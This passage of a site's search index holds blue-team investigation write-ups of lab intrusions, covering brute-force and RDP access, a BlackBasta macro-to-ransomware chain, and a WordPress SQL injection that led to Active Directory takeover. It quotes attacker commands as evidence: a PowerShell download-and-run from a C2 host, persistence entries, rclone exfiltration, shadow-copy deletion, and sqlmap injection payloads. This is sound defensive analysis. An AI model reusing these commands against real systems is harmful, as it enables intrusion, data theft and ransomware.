established C2 to 3.68.97.124 and injected into ImagingDevices.exe, dumped LSASS credentials, laterally moved to DC01 via PsExec using markw credentials, staged AdFind and AnyDesk, created sql_admin backdoor account, moved to FileServer01 and Support01, exfiltrated archived share data, and deployed Conti ransomware dropping R3ADM3.txt ransom notes.","title":"ELK-BumbleBee - GOLD CABIN","type":"blue_team"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/gold-cabin/","section":"Tags","summary":"","title":"GOLD CABIN","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/iso/","section":"Tags","summary":"","title":"ISO","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/lnk/","section":"Tags","summary":"","title":"LNK","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/lsass/","section":"Tags","summary":"","title":"Lsass","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/procdump/","section":"Tags","summary":"","title":"ProcDump","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/psexec/","section":"Tags","summary":"","title":"PsExec","type":"tags"},{"content":"","date":"April 13, 2026","externalUrl":null,"permalink":"/tags/ransomware/","section":"Tags","summary":"","title":"Ransomware","type":"tags"},{"content":" TL;DR # An attacker from 77.91.78.115 conducted a brute-force campaign against SecureTech Industries starting at 2024-09-09 16:29:05. Local account michaelwilliams on ST-WIN02 was compromised, followed four minutes later by domain account SECURETECH\\mwilliams with an elevated token. RDP access was established at 17:00:22. The attacker dropped OfficeUpdater.exe via PowerShell, created a registry Run key for persistence, then staged a toolkit archive containing mimikatz.exe, PsExec.exe, and PowerView.ps1. Mimikatz accessed lsass.exe memory and extracted credentials for jsmith. Using jsmith, the attacker moved laterally to domain controller ST-DC01 at 17:34 and file server ST-FS01 at 17:50. On the DC, FileCleaner.exe was dropped and a scheduled task FilesCheck was created for hourly SYSTEM execution. BackupRunner.exe was also deployed and executed. On ST-FS01, Archive_8673812.zip was created for data exfiltration.\nInitial Access # Brute-Force Identification # Knowing a brute-force attack had occurred, I started by filtering logs for event id 4625 to identify the attack source. 77.91.78.115 responsible for 16 events - 72.7% of all failed logon activity. I submitted this IP to AbuseIPDB. The lookup confirmed the IP had accumulated 25,047 abuse reports, belonging to provider nuxtcloud geolocated to Helsinki, Finland - a hosting provider frequently used for malicious infrastructure. The attack campaign began at 2024-09-09 16:29:05.\nSuccessful Authentication # At 16:56:05 the attacker successfully authenticated as local user michaelwilliams on machine ST-WIN02 from 77.91.78.115. No activity followed under this account.\nFour minutes later the attacker authenticated as domain account SECURETECH\\mwilliams - this time with Elevated Token: Yes, indicating the account held administrative privileges. The workstation name was recorded as kali, identifying an attacker-controlled Linux machine.\nAt 17:00:22 event id 1149 confirmed an interactive Remote Desktop session was established to ST-WIN02 by SECURETECH\\mwilliams from 77.91.78.115.\nExecution and Persistence # Dropper Deployment # With an interactive RDP session active, the attacker executed PowerShell and at 17:12:14 created C:\\Windows\\Temp\\OfficeUpdater.exe. The filename mimics a legitimate Microsoft Office update component to blend into the environment.\nRegistry Persistence # The attacker immediately established persistence by executing reg.exe with High integrity level to write a Run key:\n1reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v OfficeUpdater /t REG_SZ /d \u0026#34;C:\\Windows\\Temp\\OfficeUpdater.exe\u0026#34; /f Writing to HKLM ensures the payload executes for all users on system startup, and requires administrative privileges - consistent with the elevated token observed at logon.\nToolkit Staging # At 17:22:57 - 17:23:07 PowerShell created C:\\Users\\Public\\Backup_Tools.zip and Explorer extracted it into C:\\Users\\Public\\Backup_Tools\\, staging three tools.\nmimikatz.exe is an open-source credential extraction tool capable of dumping plaintext passwords and NTLM hashes from LSASS memory. PsExec.exe is a Sysinternals remote execution utility used for lateral movement. PowerView.ps1 is a PowerShell reconnaissance framework for Active Directory enumeration. Placing these in C:\\Users\\Public\\ ensures they are accessible from any user session without path restrictions. Credential Dumping # Mimikatz Execution # At 17:27:34 and again at 17:39:11, mimikatz.exe was launched from C:\\Users\\Public\\Backup_Tools\\ via powershell.exe on ST-WIN02.\nLSASS Memory Access # Sysmon event id 10 shows the credential dumping at 17:27. This access directly yielded the credentials for jsmith. Lateral Movement # Domain Controller and File Server Access # At 17:34:15 - 17:34:17 Event ID 4624 network logons appeared on domain controller ST-DC01 as jsmith from 77.91.78.115. At 17:50:13 - 17:50:15 the same pattern repeated on file server ST-FS01.\nPersistence on Domain Controller # Between 17:36:36 and 17:42:27 on ST-DC01, the attacker dropped C:\\Windows\\Temp\\FileCleaner.exe (Event ID 11) and created a scheduled task for persistent SYSTEM-level execution:\n1schtasks /create /tn \u0026#34;FilesCheck\u0026#34; /tr \u0026#34;powershell.exe -ExecutionPolicy Bypass -File C:\\Windows\\Temp\\FileCleaner.exe\u0026#34; /sc hourly /ru SYSTEM The task name FilesCheck blends with legitimate maintenance tasks. At 17:42:21 BackupRunner.exe was created in C:\\Users\\Public\\ and executed at 17:42:27, establishing an additional execution foothold on the domain controller.\nCollection and Exfiltration Staging # At 17:53:10 on ST-FS01, SECURETECH\\jsmith used PowerShell to create C:\\Users\\Public\\Documents\\Archive_8673812.zip (Sysmon Event ID 11), staging collected data into a single archive in a publicly accessible directory in preparation for exfiltration.\nIOCs # Type Value Description IP 77.91.78.115 attacker IP, nuxtcloud AS216127, 25,047 AbuseIPDB reports Host ST-WIN02 initial compromised host Host ST-DC01 domain controller, lateral movement target Host ST-FS01 file server, lateral movement and exfiltration staging target Domain SECURETECH compromised AD domain File C:\\Windows\\Temp\\OfficeUpdater.exe malicious dropper masquerading as Office updater File C:\\Users\\Public\\Backup_Tools.zip attacker toolkit archive File C:\\Users\\Public\\Backup_Tools\\mimikatz.exe credential dumping tool File C:\\Users\\Public\\Backup_Tools\\PsExec.exe lateral movement tool File C:\\Users\\Public\\Backup_Tools\\PowerView.ps1 AD reconnaissance framework File C:\\Windows\\Temp\\FileCleaner.exe persistence payload on ST-DC01 File C:\\Users\\Public\\BackupRunner.exe secondary payload on ST-DC01 File C:\\Users\\Public\\Documents\\Archive_8673812.zip staged exfiltration archive on ST-FS01 Registry HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OfficeUpdater persistence Run key Task FilesCheck scheduled task on ST-DC01, hourly SYSTEM execution of FileCleaner.exe Account michaelwilliams initial brute-forced local account on ST-WIN02 Account SECURETECH\\mwilliams brute-forced domain account, elevated token Account SECURETECH\\jsmith account obtained via LSASS dump, used for lateral movement Attack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef cred fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef lateral fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; A([77.91.78.115 - kali]):::default --\u003e B[16:29:05 - Brute-force beginsEvent ID 4625 - ST-WIN02]:::access B --\u003e C[16:56:05 - michaelwilliams compromisedlocal account ST-WIN02]:::access C --\u003e D[17:00 - mwilliams SECURETECHelevated token NTLM v2]:::access D --\u003e E[17:00:22 - RDP session establishedEvent ID 1149 ST-WIN02]:::access subgraph Exec [Execution and Persistence - ST-WIN02] E --\u003e F[17:12:14 - PowerShell dropsOfficeUpdater.exe in Temp]:::exec F --\u003e G[reg add HKLM Run OfficeUpdaterHigh integrity persistence]:::persist G --\u003e H[17:22:57 - Backup_Tools.zip extractedmimikatz.exe PsExec.exe PowerView.ps1]:::exec end subgraph Cred [Credential Dumping - ST-WIN02] H --\u003e I[17:27:34 - mimikatz.exe launchedEvent ID 10 - lsass.exe accessedGrantedAccess: 0x1010]:::cred I --\u003e J[jsmith credentials extracted]:::cred end subgraph Lateral [Lateral Movement] J --\u003e K[17:34:15 - jsmith logonST-DC01 from 77.91.78.115]:::lateral K --\u003e L[17:37:00 - FileCleaner.exe droppedschtasks FilesCheck SYSTEM hourly]:::persist L --\u003e M[17:42:27 - BackupRunner.exe executedST-DC01]:::exec M --\u003e N[17:50:13 - jsmith logonST-FS01 from 77.91.78.115]:::lateral end subgraph Exfil [Collection] N --\u003e O[17:53:10 - PowerShell createsArchive_8673812.zip on ST-FS01]:::exfil end ","date":"April 10, 2026","externalUrl":null,"permalink":"/blue_team/splunk-goldenspray/","section":"","summary":"An attacker from 77.91.78.115 brute-forced mwilliams credentials, connected via RDP, dropped OfficeUpdater.exe with registry persistence, staged Backup_Tools including mimikatz, dumped lsass to obtain jsmith credentials, laterally moved to ST-DC01 and ST-FS01, established scheduled task persistence on the DC, and archived client data for exfiltration.","title":"Splunk-GoldenSpray","type":"blue_team"},{"content":"","date":"April 9, 2026","externalUrl":null,"permalink":"/tags/blackbasta/","section":"Tags","summary":"","title":"BlackBasta","type":"tags"},{"content":" TL;DR # A finance employee (FINANCEES\\knixon) downloaded Financial Records.zip from attacker-controlled server 54.93.105.22 via Microsoft Edge. The extracted Financial Records.xlsm macro executed an encoded PowerShell command that downloaded and ran F6w1S48.vbs, which loaded WindowsUpdaterFX.dll via regsvr32.exe. The DLL added Windows Defender exclusions, established persistence via a registry Run key and a scheduled task, then dropped Pancake.jpg.exe as a C2 backdoor connecting back to 54.93.105.22:80. The attacker enumerated the host and domain, scanned the internal subnet, downloaded PsExec64 via bitsadmin, and laterally moved to a second host using financees.local\\swhite credentials. From there, C:\\clients was archived and exfiltrated to MEGA via rclone, the system was configured to boot into Safe Mode, shadow copies were deleted as SYSTEM, and the final BlackBasta ransomware payload 6as98v.exe was deployed.\nInitial Access # I began the investigation in Kibana by filtering for Sysmon Event ID 15 (FileCreateStreamHash) - an event generated when Windows writes a Zone.Identifier Alternate Data Stream to a downloaded file, recording its internet origin. This is the most reliable starting point for identifying drive-by downloads.\nAt 2025-03-21 15:08:22 user FINANCEES\\knixon downloaded Financial Records.zip through msedge.exe. The winlog.event_data.Contents field showed ZoneId=3 HostUrl=http://54.93.105.22/Financial%20Records.zip, confirming the file originated from the internet and identifying the attacker\u0026rsquo;s staging server. The file was saved to knixon\u0026rsquo;s Downloads folder with SHA256 1CAAEBE93B73AD6C24193EF2D20548FE2E3F82FCDFF2D0B4A09211B61ADC1F6C.\nExecution Chain # Excel Macro # At 15:09:03 the user extracted and opened Financial Records.xlsm (SHA256: 030E7AD9B95892B91A070AC725A77281645F6E75CFC4C88F53DBF448FFFD1E15). The macro designated itself as a trusted document by writing to the Excel security registry key:\n1HKU\\S-1-5-21-3865674213-28386648-2675066931-1120\\SOFTWARE\\Microsoft\\Office\\16.0\\Excel\\Security\\Trusted Documents\\TrustRecords\\%USERPROFILE%/Downloads/Financial%20Records.xlsm This self-trust registration suppresses the macro security warning on subsequent opens. At 15:09:32 the macro spawned powershell.exe.\nDecoding the base64 payload revealed:\n1Invoke-WebRequest -Uri \u0026#39;http://54.93.105.22/F6w1S48.vbs\u0026#39; -OutFile \u0026#34;$env:LOCALAPPDATA\\Temp\\F6w1S48.vbs\u0026#34; 2cmd.exe /c \u0026#34;$env:LOCALAPPDATA\\Temp\\F6w1S48.vbs\u0026#34; The macro downloaded a VBScript from the C2 server and executed it in the same command.\nVBS and DLL Loading # At 15:15:29 wscript.exe executed F6w1S48.vbs from the user\u0026rsquo;s Temp directory.\nThe script invoked regsvr32.exe /s C:\\Users\\knixon\\AppData\\Local\\Temp\\WindowsUpdaterFX.dll. regsvr32 is a legitimate Windows binary used to register COM DLLs - abusing it to load a malicious DLL is a well-known LOLBin technique (T1218.010) that bypasses application whitelisting since the host process is a signed Microsoft binary.\nPersistence and Defense Evasion # Within the same second at 15:15, WindowsUpdaterFX.dll (MD5: 735AB5713DB79516CF350265FA7574E5) executed a series of commands. It added three Windows Defender exclusion paths to prevent detection of its artifacts:\n1Add-MpPreference -ExclusionPath \u0026#34;C:\\ProgramData\\Microsoft\\ssh\u0026#34; 2Add-MpPreference -ExclusionPath \u0026#34;%APPDATA%/Microsoft\u0026#34; 3Add-MpPreference -ExclusionPath \u0026#34;%LOCALAPPDATA%/Temp\u0026#34; It then wrote a registry Run key to maintain persistence across user logons:\n1HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdater = wscript.exe %LOCALAPPDATA%/Temp/F6w1S48.vbs A second persistence mechanism was established via a scheduled task WiindowsUpdate configured to execute as SYSTEM on every logon:\n1schtasks /Create /RU \u0026#34;NT AUTHORITY\\SYSTEM\u0026#34; /SC ONLOGON /TN \u0026#34;WiindowsUpdate\u0026#34; 2 /TR \u0026#34;C:\\Windows\\System32\\regsvr32.exe /s %%localappdata%%\\Temp\\WindowsUpdaterFX.dll\u0026#34; Dropper and C2 Backdoor # The DLL created C:\\Users\\knixon\\AppData\\Local\\Temp\\Pancake.jpg.exe - the double extension .jpg.exe is a masquerading technique exploiting the Windows default of hiding known file extensions, making the binary appear as an image.\nIt then launched the binary via Start-Process $env:LOCALAPPDATA\\Temp\\Pancake.jpg.exe. The process (PID 10292) immediately established an outbound connection from 10.10.11.29 to 54.93.105.22 over port 80.\nDiscovery and Reconnaissance # Host Enumeration # With the C2 channel active, the attacker issued discovery commands through Pancake.jpg.exe spawning child cmd.exe processes at roughly one-minute intervals.\nNetwork Scanning and Tool Staging # At 15:42 the attacker deployed netscan.exe to scan the internal subnet 10.10.11.1-10.10.255.255 for live hosts and open services. To enable lateral movement, bitsadmin - another LOLBin - was used to download PsExec64.exe from a GitHub repository into the knixon Temp folder. PsExec is a Sysinternals tool that enables remote process execution on other hosts using valid credentials.\nLateral Movement # With PsExec64.exe staged, the attacker used compromised credentials financees.local\\swhite with password b\u0026lt;ZITx4h1 to authenticate to 10.10.11.170. Initial validation commands whoami and hostname confirmed remote execution was working. The attacker then propagated the implant using:\n1PsExec64.exe \\\\financees.local -accepteula -s -c -f Pancake.jpg.exe The -c -f flags copy and force-overwrite the executable to the remote host, and -s runs it as SYSTEM\nCollection and Exfiltration # Operating in the context of swhite, the attacker collected sensitive data by compressing C:\\clients into data.zip. The archive was then exfiltrated to cloud storage using rclone copy data.zip mega:data - rclone is a cloud sync utility frequently abused for data exfiltration (T1567.002) because traffic to MEGA blends with normal cloud storage activity and is rarely blocked.\nPre-Ransomware Staging # Before deploying the encryptor, the attacker executed bcdedit.exe /set safeboot network to configure the system to reboot into Safe Mode with networking. This technique disables most security software and EDR agents that do not load in Safe Mode, ensuring the ransomware can encrypt files without interference. At 16:47:19 curl downloaded the final payload 6as98v.exe from http://54.93.105.22/6as98v.exe into C:\\Users\\swhite\\AppData\\Local\\Temp\\.\nRansomware Execution and Cleanup # Shadow Copy Deletion # Shadow copies were deleted as NT AUTHORITY\\SYSTEM using vssadmin.exe delete shadows /all /quiet - a standard ransomware anti-recovery step (T1490) that removes Windows Volume Shadow Copies to prevent file restoration without paying the ransom.\nRansomware Deployment # At 16:49:19 6as98v.exe (PID 5792, MD5: 998022B70D83C6DE68E5BDF94E0F8D71) was executed. VirusTotal confirmed 61/71 vendors flagged this sample as ransomware.blackbasta/basta - BlackBasta is a ransomware-as-a-service operation known for double extortion attacks targeting enterprise environments.\nAt 16:52:52 and 16:53:30 the attacker ran cleanup commands to remove forensic artifacts from both Temp directories:\n1Remove-Item -Path \u0026#34;$env:LOCALAPPDATA\\Temp\\*\u0026#34; -Recurse -Force 2Remove-Item -Path \u0026#34;C:\\Users\\swhite\\Appdata\\Local\\Temp\\*\u0026#34; -Recurse -Force IOCs # Type Value Description IP 54.93.105.22 Attacker C2 server - payload staging and beaconing File Financial Records.zip SHA256: 1CAAEBE93B73AD6C24193EF2D20548FE2E3F82FCDFF2D0B4A09211B61ADC1F6C File Financial Records.xlsm SHA256: 030E7AD9B95892B91A070AC725A77281645F6E75CFC4C88F53DBF448FFFD1E15 File F6w1S48.vbs VBScript dropper - %LOCALAPPDATA%\\Temp\\ File WindowsUpdaterFX.dll MD5: 735AB5713DB79516CF350265FA7574E5 - malicious DLL via regsvr32 File Pancake.jpg.exe C2 backdoor - %LOCALAPPDATA%\\Temp\\ File 6as98v.exe MD5: 998022B70D83C6DE68E5BDF94E0F8D71 - BlackBasta ransomware, 61/71 VT Registry HKCU\\...\\CurrentVersion\\Run\\WindowsUpdater Persistence Run key Task WiindowsUpdate Scheduled task - runs DLL as SYSTEM on logon Account FINANCEES\\knixon Initial compromised account Account financees.local\\swhite Lateral movement account, password: b\u0026lt;ZITx4h1 Attack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef lateral fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef ransom fill:#b71c1c,stroke:#7f0000,stroke-width:2px,color:#fff; A([FINANCEES\\knixon10.10.11.29]):::default --\u003e B[15:08:22 - Edge downloadsFinancial Records.zipfrom 54.93.105.22]:::access B --\u003e C[15:09:03 - Financial Records.xlsmmacro self-trusts and executes]:::exec C --\u003e D[15:09:32 - Encoded PowerShelldownloads F6w1S48.vbs]:::exec D --\u003e E[15:15:29 - wscript.exe runs F6w1S48.vbsPID 8732]:::exec E --\u003e F[15:15:34 - regsvr32.exe loadsWindowsUpdaterFX.dll PID 8592]:::exec subgraph Persist [Persistence and Defense Evasion] F --\u003e G[15:15 - Defender exclusions addedRun key and WiindowsUpdate task created]:::persist G --\u003e H[Pancake.jpg.exe droppedC2 beacon to 54.93.105.22:80]:::persist end subgraph Discovery [Discovery] H --\u003e I[15:17-15:22 - whoami ipconfigsysteminfo net group domain admins]:::exec I --\u003e J[15:42 - netscan.exe subnet scanbitsadmin downloads PsExec64.exe]:::exec end subgraph Lateral [Lateral Movement] J --\u003e K[PsExec64 with swhite credentialsto 10.10.11.170 and financees.local DC]:::lateral end subgraph Exfil [Collection and Exfiltration] K --\u003e L[Compress-Archive C:\\clients data.ziprclone copy data.zip mega:data]:::exfil L --\u003e M[bcdedit /set safeboot networkcurl downloads 6as98v.exe]:::exfil end subgraph Ransom [Impact] M --\u003e N[vssadmin delete shadows /all /quietNT AUTHORITY\\SYSTEM]:::ransom N --\u003e O[16:49:19 - BlackBasta executedPID 5792MD5: 998022B70D83C6DE68E5BDF94E0F8D71]:::ransom O --\u003e P[16:52-16:53 - PowerShellRemove-Item Temp cleanup]:::ransom end ","date":"April 9, 2026","externalUrl":null,"permalink":"/blue_team/elk-black-basta/","section":"","summary":"A finance employee opened a malicious Excel macro from a drive-by download, which executed a VBS dropper, loaded WindowsUpdaterFX.dll via regsvr32, established persistence, dropped Pancake.jpg.exe as a C2 backdoor, performed internal reconnaissance, laterally moved to a domain controller via PsExec using compromised credentials, exfiltrated client data to MEGA via rclone, deleted shadow copies, and deployed BlackBasta ransomware.","title":"ELK-Black Basta","type":"blue_team"},{"content":"","date":"April 9, 2026","externalUrl":null,"permalink":"/tags/mega/","section":"Tags","summary":"","title":"MEGA","type":"tags"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/ad-cs/","section":"Tags","summary":"","title":"AD CS","type":"tags"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/cve-2021-24762/","section":"Tags","summary":"","title":"CVE-2021-24762","type":"tags"},{"content":" TL;DR # An attacker operating from 47.128.63.0 targeted a WordPress installation at feefaworldcup.co.th. After scanning with Nmap Scripting Engine and WPScan v3.8.28, the attacker identified the Perfect Survey plugin and exploited CVE-2021-24762 - an unauthenticated SQL injection in the get_question AJAX action - using sqlmap 1.9.3. A multi-vector UNION+XSS+RCE probe confirmed the injection at 02:25:31, and systematic blind SQLi extraction of user_pass from wordpress.wp_users ran until 03:11:50. Using cracked credentials, the attacker accessed mourinho.j at 02:35, Kerberoasted alonso.x with RC4-HMAC encryption at 02:40, then at 02:50 created a rogue computer account MADRID$, abused Resource-Based Constrained Delegation against APP-BKUP01$, and at 02:54 exploited Active Directory Certificate Services with a forged SAN for administrator@worldcup.ball to achieve full domain compromise on PACIFIC-DC.worldcup.ball.\nInitial Triage # Knowing a web attack had occurred, I started the investigation in Kibana by analyzing access.log - the HTTP access log ingested from the target web server. I examined the source.address field distribution to identify the dominant traffic source.\n47.128.63.0 accounted for 99.6% of all 2,524 records, with the remaining 0.4% from 192.168.18.29 - almost certainly internal traffic. I filtered all subsequent queries to source.address: 47.128.63.0 and examined the http.response.status_code field to understand the nature of the requests.\nThe distribution showed 200 at 49.8% and 404 at 44.3%, a pattern typical of automated scanning tools that probe many paths and receive 404 for non-existent resources while successfully hitting valid endpoints. This confirmed the traffic was tool-generated rather than manual browsing.\nReconnaissance # Nmap NSE # I sorted the filtered events chronologically to trace the attacker\u0026rsquo;s activity from the beginning. The first significant hit at Sep 18, 2025 02:12:30 showed a GET request to /wordpress/ with a response of 200 from User-Agent Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) - Nmap NSE is the scripting engine component of the Nmap network scanner, used here to fingerprint the web application.\nWPScan # At 02:19:21 the User-Agent switched to WPScan v3.8.28 - a dedicated WordPress vulnerability scanner - with the same /wordpress/ target, indicating the attacker confirmed a WordPress installation from the Nmap results and escalated to targeted CMS scanning.\nWPScan enumerated plugin paths, returning 200 responses for /wordpress/wp-content/plugins/elementor/readme.txt, /wordpress/wp-content/plugins/perfect-survey/readme.txt, /wordpress/wp-content/plugins/solace-extra/readme.txt, and /wordpress/wp-content/plugins/user-registration/readme.txt. At 02:20:04 it successfully retrieved /wordpress/wp-includes/version.php - a file that discloses the exact WordPress core version and installed component versions.\nWPScan also accessed /wordpress/wp-cron.php - WordPress\u0026rsquo;s built-in task scheduler endpoint, commonly probed to identify scheduling attack surfaces.\nInitial access # At 02:23:39 the attacker issued a single clean GET request to /wordpress/wp-admin/admin-ajax.php?action=get_question\u0026amp;question_id=1 with User-Agent sqlmap/1.9.3. This was the initial endpoint probe against the Perfect Survey plugin\u0026rsquo;s get_question AJAX action.\nSQL Injection - CVE-2021-24762 # CVE-2021-24762 (CVSS 9.8 Critical) affects Perfect Survey versions before 1.5.2 - the plugin passes the question_id GET parameter directly into a SQL query without validation or sanitization. Because WordPress AJAX endpoints can be configured to accept unauthenticated requests, no credentials are required to reach this attack surface.\nAt 02:25:31, 2 minutes after the initial probe, sqlmap sent the following exploitation payload (URL-decoded):\n1GET /wordpress/wp-admin/admin-ajax.php?action=get_question\u0026amp;question_id=1\u0026amp;KpuO=5677 AND 1=1 UNION ALL SELECT 1,NULL,\u0026#39;\u0026lt;script\u0026gt;alert(\u0026#34;XSS\u0026#34;)\u0026lt;/script\u0026gt;\u0026#39;,table_name FROM information_schema.tables WHERE 2\u0026gt;1--/**/; EXEC xp_cmdshell(\u0026#39;cat ../../../etc/passwd\u0026#39;)# This is a multi-vector injection probe. The UNION ALL SELECT ... FROM information_schema.tables attempts to enumerate the database schema by appending an additional result set to the original query. The \u0026lt;script\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/script\u0026gt; string embedded in the UNION output tests whether SQL results are reflected unsanitized into the HTTP response. Finally, EXEC xp_cmdshell('cat ../../../etc/passwd') attempts OS command execution through SQL Server\u0026rsquo;s shell procedure with a path traversal to read the system password file. The server responded with HTTP 200 and 10,301 bytes, confirming the injection was processed and the payload reached the database layer.\nWith injection confirmed, sqlmap shifted to systematic blind boolean-based extraction of the user_pass column from wordpress.wp_users. At 02:52:47 requests of the following pattern were observed:\n1GET /wordpress/wp-admin/admin-ajax.php?action=get_question\u0026amp;question_id=1 AND ORD(MID((SELECT IFNULL(CAST(user_pass AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),59,1))\u0026gt;96 This query extracts one character at a time from the password hash. The extraction campaign ran until 03:11:50, at which point the last sqlmap request was recorded.\nPost-Exploitation and Lateral Movement # With cracked WordPress credentials, the attacker pivoted into Active Directory. I correlated the timeline by examining Windows Security event logs alongside the web logs. The table of authentication events grouped by target_user and ip_address revealed the full lateral movement sequence.\nAt 02:35 the attacker first accessed mourinho.j from 47.128.63.0, with an ANONYMOUS LOGON event co-occurring in the same window - consistent with an initial unauthenticated LDAP or SMB reconnaissance step before authenticating. At 02:40 I found a cluster of Event ID 4769 (Kerberos Service Ticket Request) events targeting mourinho.j@worldcup.ball.\nThe expanded Event 4769 showed target_user_name: mourinho.j@worldcup.ball, service_name: alonso.x, and critically ticket_encryption_type: 0x17 - 0x17 is RC4-HMAC, the weak encryption type specifically requested during Kerberoasting, an attack where the attacker requests a TGS ticket for a service account, receives it encrypted with the account\u0026rsquo;s NTLM hash, and cracks it offline. This confirmed the attacker used mourinho.j\u0026rsquo;s session to Kerberoast alonso.x and subsequently cracked its password offline, gaining access as alonso.x at 02:50.\nAt 02:50:30, acting as alonso.x, the attacker created a new computer account - Event ID 4741 (Computer Account Created) - with sam_account_name: MADRID$ on PACIFIC-DC.worldcup.ball.\nCreating a rogue computer account is a prerequisite for a Resource-Based Constrained Delegation (RBCD) attack - by controlling a computer account, the attacker can configure delegation rights to impersonate any user against a target service. One second later at 02:50:31, Event ID 4742 (Computer Account Changed) was logged with target_user_name: APP-BKUP01$, reflecting alonso.x writing RBCD attributes onto the backup server account to allow MADRID$ to impersonate users against it.\nAt 02:50:45 the attacker requested a service ticket to APP-BKUP01$ via RBCD and successfully logged into it at 02:54:23.\nAt 02:54:24, Event ID 4886 (Certificate Services received a certificate request) was logged with attributes: CertificateTemplate:WorkstationAuth_Internal and SAN:upn=administrator@worldcup.ball.\nThis is ESC1-style AD CS abuse - by requesting a certificate from a template that allows the requester to specify a Subject Alternative Name (SAN), the attacker embedded administrator@worldcup.ball as the UPN in the certificate. This certificate can then be used to authenticate as administrator via Kerberos PKINIT, bypassing password requirements entirely. At 02:54:32, 8 seconds later, Event ID 4769 fired on PACIFIC-DC.worldcup.ball with target_user_name: administrator@worldcup.ball, service_name: Administrator, and ip_address: ::ffff:47.128.63.0 - confirming full domain administrator access was achieved.\nIOCs # Type Value Description IP 47.128.63.0 attacker IP, all attack stages Host feefaworldcup.co.th targeted WordPress host Host PACIFIC-DC.worldcup.ball Domain Controller, lateral movement target Host APP-BKUP01$ backup server, RBCD target Domain worldcup.ball compromised AD domain CVE CVE-2021-24762 Perfect Survey plugin SQLi, CVSS 9.8 Plugin /wordpress/wp-content/plugins/perfect-survey/ vulnerable plugin path Account mourinho.j initial AD foothold via cracked WordPress credentials Account alonso.x Kerberoasted service account, used for RBCD setup Account MADRID$ rogue computer account created by attacker Account administrator@worldcup.ball final compromised account via AD CS abuse Attack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef recon fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exploit fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef lateral fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef persist fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef pwned fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; A([47.128.63.0 - Attacker]):::default --\u003e B[02:12:30 - Nmap NSE scanfeefaworldcup.co.th/wordpress/]:::recon B --\u003e C[02:19:21 - WPScan v3.8.28Perfect Survey plugin discoveredversion.php and wp-cron.php accessed]:::recon C --\u003e D[02:23:39 - sqlmap 1.9.3CVE-2021-24762 initial probe/wp-admin/admin-ajax.php?action=get_question]:::exploit D --\u003e E[02:25:31 - UNION+XSS+RCE payloadHTTP 200 - injection confirmed]:::exploit E --\u003e F[02:52:47 - Blind SQLi extractionuser_pass from wordpress.wp_usersends at 03:11:50]:::exploit subgraph AD [Active Directory Compromise] F --\u003e G[02:35 - mourinho.j accessinitial AD foothold]:::lateral G --\u003e H[02:40:44 - Event 4769Kerberoasting alonso.xRC4-HMAC ticket requested]:::lateral H --\u003e I[02:50 - alonso.x accesshash cracked offline]:::lateral I --\u003e J[02:50:30 - Event 4741MADRID$ computer account created]:::persist J --\u003e K[02:50:31 - Event 4742RBCD configured on APP-BKUP01$]:::persist K --\u003e L[02:54:23 - logged into APP-BKUP01$]:::persist end subgraph Escalation [Domain Escalation] L --\u003e M[02:54:24 - Event 4886AD CS certificate requestSAN: administrator@worldcup.ball]:::pwned M --\u003e N[02:54:32 - Event 4769administrator@worldcup.ball TGSPACIFIC-DC.worldcup.ball]:::pwned end ","date":"April 8, 2026","externalUrl":null,"permalink":"/blue_team/elk-perfect-survey/","section":"","summary":"An attacker conducted reconnaissance with Nmap and WPScan against a WordPress site, exploited CVE-2021-24762 in the Perfect Survey plugin via SQLi to extract wp_users password hashes, then pivoted into Active Directory by Kerberoasting alonso.x, creating a rogue computer account, abusing 